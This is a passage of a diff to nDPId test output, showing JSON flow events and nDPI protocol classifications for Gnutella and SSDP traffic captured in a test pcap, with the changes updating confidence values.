{"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174144,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131671,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.197.219.85","src_port":28681,"dst_port":26234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90845,"flow_last_seen":174321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1001,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82058,"flow_last_seen":251736,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82066,"flow_last_seen":253024,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90138,"flow_last_seen":252085,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3710,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90138,"flow_last_seen":252085,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3710,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":89016,"flow_last_seen":176659,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4777,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82058,"flow_last_seen":191704,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.163.231.160","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90864,"flow_last_seen":124089,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":943,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90039,"flow_last_seen":180164,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90039,"flow_last_seen":180164,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":83518,"flow_last_seen":253026,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.37","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":132832,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82058,"flow_last_seen":191703,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.150.49.35","src_port":28681,"dst_port":32448,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89829,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89829,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":251737,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82058,"flow_last_seen":191703,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1987,48 +1987,48 @@ 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.157.183.106","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":253024,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131672,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":28681,"dst_port":35589,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":180322,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":180322,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82064,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"138.199.16.123","src_port":28681,"dst_port":52993,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90138,"flow_last_seen":174930,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90138,"flow_last_seen":174930,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131673,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.126.160.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82058,"flow_last_seen":251738,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":280014,"flow_last_seen":280014,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":280014,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":280014,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":280014,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LMAAAER3GYKAAIP7\/\/\/+uDQB2wAtgxeTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":280014,"flow_last_seen":280014,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":280014,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":280014,"flow_last_seen":280014,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":280014,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
